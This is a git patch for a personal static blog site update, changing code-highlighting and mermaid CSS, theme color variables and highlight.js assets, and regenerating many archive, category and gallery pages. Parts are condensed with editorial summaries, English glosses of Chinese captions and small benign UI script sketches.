From 58f314e57f976719de1b3e9d72df76473bdf8e16 Mon Sep 17 00:00:00 2001
From: GZ-Metal-Cell <1904817346@qq.com>
Date: Sat, 30 Nov 2024 11:46:59 +0800
Subject: [PATCH] Site updated: 2024-11-30 11:46:26
---
 css/index.css                              | 101 ++--
 css/plugins/highlight/highlight-dark.css   |   1 -
 css/plugins/highlight/highlight-light.css  |   1 -
 css/plugins/highlight_tools.css            |  67 ++-
 css/plugins/mermaid.css                    |  37 ++
 css/public/var.css                         |  12 +-
 css/widgets/main.css                       |  32 +-
 js/highlightjs-vue/highlightjs-vue.js      |   8 +
 js/highlightjs-vue/init-highlightjs-vue.js |   2 +
 js/highlightjs.js                          |   2 +
 js/plugins/highlight_tools.js              |  52 +-
 js/plugins/mermaid.js                      |  43 +-
 robots.txt                                 |   9 +
 search.xml                                 | 462 +++++++++---------
 [diffstat for the remaining ~830 regenerated HTML pages under archives/, categories/, galleries/, page/, posts/, and tags/ — mostly 4-line changes each — plus the created/deleted post assets listed below]
 849 files changed, 6401 insertions(+), 6105 deletions(-)
 create mode 100644 js/highlightjs-vue/highlightjs-vue.js
 create mode 100644 js/highlightjs-vue/init-highlightjs-vue.js
 create mode 100644 js/highlightjs.js
 create mode 100644 "posts/Web-Vue\357\274\210Vue \347\273\204\344\273\266\345\214\226\347\274\226\347\250\213 & \350\204\232\346\211\213\346\236\266\357\274\211/84-1.webp"
 create mode 100644 "posts/Web-Vue\357\274\210Vue \347\273\204\344\273\266\345\214\226\347\274\226\347\250\213 & \350\204\232\346\211\213\346\236\266\357\274\211/85-1.webp"
 delete mode 100644 "posts/Web-Vue\357\274\210Vue \347\273\204\344\273\266\345\214\226\347\274\226\347\250\213 & \350\204\232\346\211\213\346\236\266\357\274\211/data062.json"
 create mode 100644 robots.txt

diff --git a/404.html b/404.html
index 98f842d4c7..0e9acfaf07 100644
--- a/404.html
+++ b/404.html
@@ -43,8 +43,6 @@
-
-
@@ -336,6 +334,8 @@
     var highlightShrink = "";
     var HighlightHeightLimit = "";
+
+

diff --git a/about/artitalk/index.html b/about/artitalk/index.html
index 5a05448d4c..83fa1542c9 100644
--- a/about/artitalk/index.html
+++ b/about/artitalk/index.html
@@ -43,8 +43,6 @@
-
-
@@ -587,6 +585,8 @@

 这是一个神秘的空间~
     var highlightShrink = "";
     var HighlightHeightLimit = "";
+
+

diff --git a/about/index.html b/about/index.html
index 72e8415e82..b48ee76691 100644
--- a/about/index.html
+++ b/about/index.html
@@ -50,8 +50,6 @@
-
-
@@ -346,12 +344,12 @@

 关于我
 关于
-
+
 
+
+

diff --git a/archives/2022/05/index.html b/archives/2022/05/index.html
index ca3b6a809b..9cad2f629d 100644
--- a/archives/2022/05/index.html
+++ b/archives/2022/05/index.html
@@ -43,8 +43,6 @@
-
-
@@ -573,6 +571,8 @@
 目录
     var highlightShrink = "";
     var HighlightHeightLimit = "";
+
+

[The same two hunks repeat, differing only in line offsets, for every remaining archives/ index page in the diffstat, from archives/2022/06/index.html through archives/page/18/index.html; the patch breaks off inside the diff for archives/page/19/index.html.]

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/2/index.html b/archives/page/2/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/2/index.html +++ b/archives/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/20/index.html b/archives/page/20/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/20/index.html +++ b/archives/page/20/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/21/index.html b/archives/page/21/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/21/index.html +++ b/archives/page/21/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/22/index.html b/archives/page/22/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/22/index.html +++ b/archives/page/22/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/23/index.html b/archives/page/23/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/23/index.html +++ b/archives/page/23/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/24/index.html b/archives/page/24/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/24/index.html +++ b/archives/page/24/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/25/index.html b/archives/page/25/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/25/index.html +++ b/archives/page/25/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/26/index.html b/archives/page/26/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/26/index.html +++ b/archives/page/26/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/27/index.html b/archives/page/27/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/27/index.html +++ b/archives/page/27/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/28/index.html b/archives/page/28/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/28/index.html +++ b/archives/page/28/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/29/index.html b/archives/page/29/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/29/index.html +++ b/archives/page/29/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/3/index.html b/archives/page/3/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/3/index.html +++ b/archives/page/3/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/30/index.html b/archives/page/30/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/30/index.html +++ b/archives/page/30/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/31/index.html b/archives/page/31/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/31/index.html +++ b/archives/page/31/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/32/index.html b/archives/page/32/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/32/index.html +++ b/archives/page/32/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/33/index.html b/archives/page/33/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/33/index.html +++ b/archives/page/33/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/34/index.html b/archives/page/34/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/34/index.html +++ b/archives/page/34/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/35/index.html b/archives/page/35/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/35/index.html +++ b/archives/page/35/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/36/index.html b/archives/page/36/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/36/index.html +++ b/archives/page/36/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/37/index.html b/archives/page/37/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/37/index.html +++ b/archives/page/37/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/38/index.html b/archives/page/38/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/38/index.html +++ b/archives/page/38/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/39/index.html b/archives/page/39/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/39/index.html +++ b/archives/page/39/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/4/index.html b/archives/page/4/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/4/index.html +++ b/archives/page/4/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/40/index.html b/archives/page/40/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/40/index.html +++ b/archives/page/40/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/41/index.html b/archives/page/41/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/41/index.html +++ b/archives/page/41/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/42/index.html b/archives/page/42/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/42/index.html +++ b/archives/page/42/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/43/index.html b/archives/page/43/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/43/index.html +++ b/archives/page/43/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/5/index.html b/archives/page/5/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/5/index.html +++ b/archives/page/5/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/6/index.html b/archives/page/6/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/6/index.html +++ b/archives/page/6/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/7/index.html b/archives/page/7/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/7/index.html +++ b/archives/page/7/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/8/index.html b/archives/page/8/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/8/index.html +++ b/archives/page/8/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/archives/page/9/index.html b/archives/page/9/index.html index ff4126078f..11b608894d 100644 --- a/archives/page/9/index.html +++ b/archives/page/9/index.html @@ -43,8 +43,6 @@ - - @@ -2803,6 +2801,8 @@

目录

diff --git a/categories/index.html b/categories/index.html
index 82914d0a12..f992de5ea8 100644
--- a/categories/index.html
+++ b/categories/index.html
@@ -43,8 +43,6 @@
-
-
@@ -559,6 +557,8 @@
 
 好像也没分几类
 
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+

(The caption 好像也没分几类 reads "Doesn't look like much got categorized".) The same pair of hunks is applied to every category page; only the blob hashes, the second hunk's offsets, and the sidebar caption (目录, "Table of Contents") differ. Paths are decoded here from git's octal escapes:

  categories/图书/index.html ("Books")                             index 52277b02a9..71b98a40e4, second hunk @@ -561,6 +559,8 @@
  categories/学习/index.html and page/2 through page/31 ("Study")  index 8474d76580..0cfadd0135, second hunk @@ -2241,6 +2239,8 @@
  categories/游戏/index.html ("Games")                             index 4c1858fc35..a036101c18, second hunk @@ -561,6 +559,8 @@
  categories/计划/index.html ("Plans")                             index 89212ff46c..adbd990016, second hunk @@ -616,6 +614,8 @@
  categories/记录/index.html and page/2 through page/12 ("Notes")  index cfa0e6b079..96cd11e901, second hunk @@ -1351,6 +1349,8 @@

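Every page hunk above carries the inline globals `var highlightShrink` and `var HighlightHeightLimit`, and the stylesheet changes that follow add a `.highlight.closed tbody { display: none; }` rule plus a `.close-code-block-button` in the code tool bar. A minimal sketch of the wiring this implies (the globals, class names, and selector come from this patch; the event handling itself is an assumption, not the theme's actual script):

<script>
  // Sketch only: the collapse behavior implied by `.highlight.closed tbody { display: none; }`.
  // `highlightShrink` is the per-page global seen in every hunk above; treating it as a
  // "collapse code blocks by default" flag is an assumption.
  document.querySelectorAll('.highlight').forEach(function (block) {
    if (typeof highlightShrink !== 'undefined' && highlightShrink === 'true') {
      block.classList.add('closed'); // hides the <tbody> holding the code rows
    }
    // Assumes the tool bar (and its close button) sits inside the .highlight element.
    var btn = block.querySelector('.close-code-block-button');
    if (btn) {
      btn.addEventListener('click', function () {
        block.classList.toggle('closed');
      });
    }
  });
</script>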
diff --git a/css/index.css b/css/index.css
index 583342c629..9618db921a 100644
--- a/css/index.css
+++ b/css/index.css
@@ -18,6 +18,61 @@
 .hbe-container {
   margin: 0 !important;
 }
+.highlight.closed tbody {
+  display: none;
+}
+.highlight {
+  margin: 5px 0;
+  border: 2px solid var(--border);
+  tab-size: 4;
+}
+.highlight table {
+  display: block;
+  border: none;
+  margin: 0;
+  background-color: var(--tabs-bg);
+  overflow: auto;
+}
+.highlight table td:hover,
+.highlight table tr:hover {
+  background: none;
+}
+.highlight table td {
+  border: 0;
+  padding: 0;
+}
+.highlight table td pre {
+  text-align: right;
+  line-height: 1.5em;
+}
+.highlight table td pre span {
+  font-family: SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
+}
+.highlight table td pre span,
+.highlight table td pre code {
+  font-size: 15px;
+  width: 100%;
+  overflow-x: auto;
+  flex: 1;
+  text-align: left;
+  word-spacing: normal;
+  word-break: normal;
+  word-wrap: normal;
+  border-radius: 0;
+  line-height: 1.5em;
+  transition: background 0.5s ease-in-out, color 0.5s ease-in-out;
+}
+.highlight table .gutter {
+  border-right: 1px solid var(--border);
+  padding: 10px;
+}
+.highlight table .gutter .line {
+  color: var(--th-text);
+}
+.highlight table .code {
+  padding: 10px;
+  overflow: auto;
+}
 .highlight-tools {
   background: var(--highlight-tools-bg);
   position: relative;
@@ -25,13 +80,14 @@
   transition: background 0.5s ease-in-out;
 }
 .highlight-tools .copy-notice {
+  line-height: 32px;
   font-weight: 500;
   position: absolute;
-  right: 30px;
+  right: 32px;
   font-size: 14px;
   opacity: 0;
   transition: opacity 0.5s;
-  color: var(--highlight-tools-text);
+  color: var(--th-text);
   -webkit-user-select: none;
   /* Safari */
   -moz-user-select: none;
@@ -56,11 +112,13 @@
   filter: brightness(120%);
 }
 .highlight-tools .code-lang {
+  margin-left: 10px;
+  line-height: 32px;
   font-weight: bold;
   position: absolute;
   left: 30px;
   font-size: 18px;
-  color: var(--highlight-tools-text);
+  color: var(--th-text);
   font-family: SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
 }
 .highlight-tools .close-code-block-button {
@@ -77,9 +135,6 @@
 .highlight-tools .close-code-block-button:hover {
   cursor: pointer;
 }
-pre .closed {
-  display: none;
-}
 .local-search {
   display: grid;
 }
@@ -821,23 +876,6 @@ article img {
   margin: 5px auto;
   display: flex;
 }
-article pre {
-  font-size: 0.9em;
-  line-height: 1.5em;
-  display: flex;
-  max-width: 100%;
-  position: relative;
-}
-article pre code {
-  overflow-x: auto;
-  flex: 1;
-  text-align: left;
-  padding: 10px 15px;
-  word-spacing: normal;
-  word-break: normal;
-  word-wrap: normal;
-  border-radius: 0;
-}
 article details summary {
   cursor: pointer;
   line-height: 30px;
@@ -923,7 +961,7 @@ article p code,
 article td code:not(pre code),
 article ul code:not(pre code),
 article li code:not(pre code) {
-  font-size: 0.9em;
+  font-size: 15px;
   margin: 0 4px;
   padding: 3px 6px;
   font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
@@ -939,9 +977,6 @@ article p strong {
 }
 article .table-container {
   overflow-x: auto;
 }
-article .highlight table {
-  width: 100%;
-}
 article table {
   border-collapse: collapse;
   line-height: 1.2em;
@@ -982,16 +1017,13 @@ article table tr td:first-child {
 }
 article thead tr {
   height: 2.5em;
 }
-article thead tr:nth-child(odd) {
-  background: hsla(0, 0%, 96.5%, 0.51);
-}
 article thead th {
-  color: var(--text-primary);
-  background: var(--tabs-bg);
   text-align: left;
   transition: all 0.5s ease-in-out;
   padding: 0 1em;
   line-height: 30px;
+  color: var(--text-primary);
+  background: var(--tabs-bg);
 }
 article tbody tr {
   line-height: 30px;
@@ -1007,9 +1039,6 @@ article tbody td {
   line-height: 30px;
   transition: border 0.5s ease-in-out, color 0.5s ease-in-out;
 }
-article tbody td.code {
-  padding: 0;
-}
 article [id^="reffn_"]::before {
   content: "[";
 }
@@ -1572,7 +1601,6 @@ pre code {
 }
 [data-theme='light'] .hljs {
   color: #24292e;
-  background: #f6f8fa;
 }
 [data-theme='light'] .hljs-doctag,
 [data-theme='light'] .hljs-keyword,
@@ -1679,7 +1707,6 @@ Original One Dark Syntax theme from https://github.com/atom/one-dark-syntax
 */
 [data-theme='dark'] pre code {
   color: #ccc;
-  background: #1f1f1f;
 }
 [data-theme='dark'] .hljs-comment,
 [data-theme='dark'] .hljs-quote {
diff --git a/css/plugins/highlight/highlight-dark.css b/css/plugins/highlight/highlight-dark.css
index 325d2ec707..80e97cceab 100644
--- a/css/plugins/highlight/highlight-dark.css
+++ b/css/plugins/highlight/highlight-dark.css
@@ -6,7 +6,6 @@ Original One Dark Syntax theme from https://github.com/atom/one-dark-syntax
 */
 [data-theme='dark'] pre code {
   color: #ccc;
-  background: #1f1f1f;
 }
 [data-theme='dark'] .hljs-comment,
 [data-theme='dark'] .hljs-quote {
diff --git a/css/plugins/highlight/highlight-light.css b/css/plugins/highlight/highlight-light.css
index 7faf89e2d1..318b7cff21 100644
--- a/css/plugins/highlight/highlight-light.css
+++ b/css/plugins/highlight/highlight-light.css
@@ -42,7 +42,6 @@ pre code {
 }
 [data-theme='light'] .hljs {
   color: #24292e;
-  background: #f6f8fa;
 }
 [data-theme='light'] .hljs-doctag,
 [data-theme='light'] .hljs-keyword,
diff --git a/css/plugins/highlight_tools.css b/css/plugins/highlight_tools.css
index 0c3203f490..6694318db5 100644
--- a/css/plugins/highlight_tools.css
+++ b/css/plugins/highlight_tools.css
@@ -1,3 +1,58 @@
[the same 55 added lines, `.highlight.closed tbody` through `.highlight table .code`, as in css/index.css above]
 .highlight-tools {
   background: var(--highlight-tools-bg);
   position: relative;
@@ -5,13 +60,14 @@
[the same `.highlight-tools .copy-notice` changes as in css/index.css above: add `line-height: 32px;`, `right: 30px` becomes `right: 32px`, `color: var(--highlight-tools-text)` becomes `color: var(--th-text)`]
@@ -36,11 +92,13 @@
[the same `.highlight-tools .code-lang` changes as in css/index.css above: add `margin-left: 10px;` and `line-height: 32px;`, `color: var(--highlight-tools-text)` becomes `color: var(--th-text)`]
@@ -57,6 +115,3 @@
 .highlight-tools .close-code-block-button:hover {
   cursor: pointer;
 }
-pre .closed {
-  display: none;
-}
diff --git a/css/plugins/mermaid.css b/css/plugins/mermaid.css
index e8986d01bc..70d476454e 100644
--- a/css/plugins/mermaid.css
+++ b/css/plugins/mermaid.css
@@ -1,4 +1,41 @@
 .mermaid {
   display: flex;
   justify-content: center;
-}
\ No newline at end of file
+}
+
+.mermaid-container:hover>.mermaid-tools>.copy-button {
+  display: block;
+}
+
+.mermaid-tools>.copy-button {
+  display: none;
+  position: absolute;
+  width: 18px;
+  height: 18px;
+  right: 85px;
+  border: none;
+  background-color: rgba(0, 0, 0, 0);
+  background-size: cover;
+}
+
+.mermaid-tools>.copy-button:hover {
+  cursor: pointer;
+  filter: brightness(120%);
+}
+
+.mermaid-tools>.copy-notice {
+  font-weight: 500;
+  position: absolute;
+  right: 110px;
+  font-size: 14px;
+  opacity: 0;
+  transition: opacity 0.5s;
+  color: var(--th-text);
+  -webkit-user-select: none;
+  /* Safari */
+  -moz-user-select: none;
+  /* Firefox */
+  -ms-user-select: none;
+  /* IE 10+ */
+  user-select: none;
+}
\ No newline at end of file
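The mermaid.css hunk above is presentation only: the copy button stays hidden until `.mermaid-container` is hovered, and the notice fades through its `transition: opacity 0.5s`. Making the button functional takes a handler along these lines (the selectors come from the CSS above; the `data-source` stash of the raw diagram text is an assumption, not the site's actual script):

<script>
  // Sketch only: copy-to-clipboard for a rendered mermaid diagram.
  document.querySelectorAll('.mermaid-container').forEach(function (container) {
    var button = container.querySelector('.mermaid-tools > .copy-button');
    var notice = container.querySelector('.mermaid-tools > .copy-notice');
    if (!button || !notice) return;
    button.addEventListener('click', function () {
      var source = container.dataset.source || ''; // assumed: raw mermaid text kept on the container
      navigator.clipboard.writeText(source).then(function () {
        notice.style.opacity = '1';  // fades in via the CSS transition
        setTimeout(function () { notice.style.opacity = '0'; }, 1500);
      });
    });
  });
</script>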
diff --git a/css/public/var.css b/css/public/var.css
index 9a81c34f14..3c5e0fed7e 100644
--- a/css/public/var.css
+++ b/css/public/var.css
@@ -8,10 +8,10 @@
   --background-tertiary: #eff2f6;
   --blockquote-bg: #fafafa;
   --border: #ececec;
-  --code-bg: #f1f5fb;
   --highlight-tools-bg: #e6ebf1;
-  --highlight-tools-text: #b3b3b3;
-  --tabs-bg: #f8f8f8;
+  --th-text: #90a4ae;
+  --tabs-bg: #f6f8fa;
+  --code-bg: #f1f5fb;
   --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
 }
@@ -25,9 +25,9 @@
   --background-tertiary: rgba(0, 0, 0, 0.95);
   --blockquote-bg: transparent;
   --border: #2c2c2c;
-  --code-bg: #2c2c2c;
   --highlight-tools-bg: #1a1a1a;
-  --highlight-tools-text: #cdcdcd;
-  --tabs-bg: #2c2c2c;
+  --th-text: #cdcdcd;
+  --tabs-bg: #1f1f1f;
+  --code-bg: #2c2c2c;
   --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0));
 }
\ No newline at end of file
diff --git a/css/widgets/main.css b/css/widgets/main.css
index 28f37d7dba..3d60796816 100644
--- a/css/widgets/main.css
+++ b/css/widgets/main.css
@@ -130,23 +130,6 @@ article img {
[the same deletion of the old `article pre` / `article pre code` rules as in css/index.css above]
@@ -232,7 +215,7 @@ article p code,
[the same `font-size: 0.9em` to `font-size: 15px` change for inline code as in css/index.css above]
@@ -248,9 +231,6 @@ article p strong {
[the same deletion of `article .highlight table { width: 100%; }` as in css/index.css above]
@@ -291,16 +271,13 @@ article table tr td:first-child {
[the same `article thead` changes as in css/index.css above: drop the odd-row `hsla(0, 0%, 96.5%, 0.51)` background and move `color: var(--text-primary); background: var(--tabs-bg);` to the end of the `article thead th` rule]
@@ -316,9 +293,6 @@ article tbody td {
[the same deletion of `article tbody td.code { padding: 0; }` as in css/index.css above]
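Taken together, css/index.css, highlight_tools.css, and var.css now style a table-based code block: a `.gutter` cell of right-aligned line numbers beside a `.code` cell, a tool bar above, and every color resolved through `--tabs-bg` / `--th-text` / `--border`, which the `[data-theme='dark']` block re-points (`--tabs-bg`, for example, is #f6f8fa in light mode and #1f1f1f in dark). A minimal sketch of the markup those selectors imply; the exact nesting is an assumption modeled on Hexo's stock highlight output:

<html data-theme="light"> <!-- set data-theme="dark" to re-point the variables -->
  <body>
    <article>
      <figure class="highlight"> <!-- 2px var(--border) frame, tab-size: 4 -->
        <div class="highlight-tools">
          <span class="code-lang">css</span>       <!-- bold, var(--th-text) -->
          <span class="copy-notice">Copied!</span> <!-- opacity 0 until shown -->
          <i class="close-code-block-button"></i>
        </div>
        <table> <!-- var(--tabs-bg) background -->
          <tbody> <!-- `.highlight.closed tbody` hides exactly these rows -->
            <tr>
              <td class="gutter"><pre><span class="line">1</span></pre></td>
              <td class="code"><pre><code>.demo { color: var(--th-text); }</code></pre></td>
            </tr>
          </tbody>
        </table>
      </figure>
    </article>
  </body>
</html>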

diff --git a/galleries/index.html b/galleries/index.html
index 18ae013424..653bff5f9f 100644
--- a/galleries/index.html
+++ b/galleries/index.html
@@ -43,8 +43,6 @@
-
-
@@ -461,6 +459,8 @@
 
 小时候
 
 var highlightShrink = ""; var HighlightHeightLimit = "";
+
+

(The caption 小时候 reads "When I was little".) The same pair of hunks is applied to every gallery page under the three album groups 小时候 ("when I was little"), 本科 ("undergrad"), and 研究生 ("grad school"); only the blob hashes, the second hunk's offsets, and each album's caption differ. Paths are decoded from git's octal escapes; captions are quoted with an English gloss:

  galleries/小时候/index.html            index 6aa7f37edb..e530578591, @@ -521,6 +519,8 @@, caption 更小的时候 ("when I was even littler")
  galleries/小时候/上海/index.html       index cf46d52fa0..efa405ee60
  galleries/小时候/乌山小学/index.html   index 12ed8e1b14..1014306e67
  galleries/小时候/云南/index.html       index 0b70ef0fbe..54c0ab369f
  galleries/小时候/兔中/index.html       index f126066014..ffc3842591
  galleries/小时候/时代中学/index.html   index 1d43ce40f4..1865526035
  galleries/小时候/更小的时候/index.html index 92cd5e2bc5..961969bea7
  galleries/小时候/甘肃和新疆/index.html index c7a6fd1341..13ed9ef2f5
  galleries/小时候/画/index.html         index 698863828c..bb7e636bbd
  galleries/小时候/福州/index.html       index 7de5b96be2..b75211e9a1
      (each of the nine sub-albums above: second hunk @@ -526,6 +524,8 @@, caption 有趣的相册~(施工中), "a fun album ~ (under construction)")

  galleries/本科/PS 作品/index.html      index 4381f0757a..2c1285a0ae, @@ -526,6 +524,8 @@, caption 一阵乱 P ("a flurry of random Photoshopping")
  galleries/本科/index.html              index c36ffb042e..5f827bdbc4, @@ -511,6 +509,8 @@, caption 炉石传说 ("Hearthstone")
  galleries/本科/北京/index.html         index f40277072b..472521e29a, @@ -526,6 +524,8 @@, caption 北京欢迎你~有梦想谁都了不起~ ("Beijing welcomes you ~ anyone with a dream is amazing ~")
  galleries/本科/厦门/index.html         index 1b60e5313e..1b2077ef42, @@ -526,6 +524,8 @@, caption 太坑了!宰客门!!! ("Such a ripoff! Tourist-gouging-gate!!!")
  galleries/本科/校园风光/index.html     index 4f251fb9d6..d1500670ac, @@ -526,6 +524,8 @@, caption 知明行笃 立诚致广 (the university motto: "know clearly, act steadfastly; stand on sincerity, reach for breadth")
  galleries/本科/炉石传说/index.html     index 127736b566..899d8d2694, @@ -526,6 +524,8 @@, caption 召唤 7 甲! ("Summon 7 Armor!")
  galleries/本科/福州/index.html         index f4ad0ee9f1..ff14bc0fff, @@ -526,6 +524,8 @@, caption 三坊七巷真好玩!百姓鲜捞真好吃! ("Sanfang Qixiang is great fun! Baixing Xianlao is delicious!")
  galleries/本科/绘画基础/index.html     index 227e081e28..797a5a431d, @@ -526,6 +524,8 @@, caption 鬼画符 ("illegible scrawl")
  galleries/本科/考研那些事/index.html   index b9adf94644..e25cc98ccf, @@ -526,6 +524,8 @@, caption 师大人称小协和 ("known around the Normal University as the little PUMC")

  galleries/研究生/index.html            index 4c2d28960e..c0858a845d, @@ -511,6 +509,8 @@, caption 天津 ("Tianjin")
  galleries/研究生/北京/index.html       index 59a0bf4638..3631ecb8af, @@ -526,6 +524,8 @@, caption 王侯已成背影 有谁在看着云起云落的变迁 ("kings and lords are silhouettes now; who still watches the clouds rise and fall")
  galleries/研究生/南昌/index.html       index a88377ca67..3a6d95c911, @@ -526,6 +524,8 @@, caption 落霞与孤鹜齐飞,秋水共长天一色 ("sunset clouds fly with a lone duck; autumn waters share the sky's one color")
  galleries/研究生/厦门/index.html       index 61624fda8d..f8b9058882, @@ -526,6 +524,8 @@, caption 去往何方 才能捧回我的月光 灯火辉煌 是我易碎的梦 ("where must I go to carry back my moonlight; the blazing lights are my fragile dream")
  galleries/研究生/天津/index.html       index 0db536426a..d5d68c078e, @@ -526,6 +524,8 @@, caption 天天乐道,津津有味 ("delight in it daily, savor it fully", a Tianjin pun)
  galleries/研究生/杭州/index.html       index 082af1e62e..0832321e13, @@ -526,6 +524,8 @@, caption 最忆是杭州 ("what I remember most is Hangzhou")
  galleries/研究生/武汉/index.html       index 0dc877a176..3e47037a3c, @@ -526,6 +524,8 @@, caption 武汉,每天不一样! ("Wuhan, different every day!")
  galleries/研究生/河北/index.html       index 7d1105345c..09eccb09f5, @@ -491,6 +489,8 @@, caption 正定 ("Zhengding")
  galleries/研究生/河北/保定-春夏/index.html  index c96cd3a02f..58899fa82b, @@ -526,6 +524,8 @@, caption 关山难越,萍水相逢。 ("mountains hard to cross; strangers met like duckweed on water")
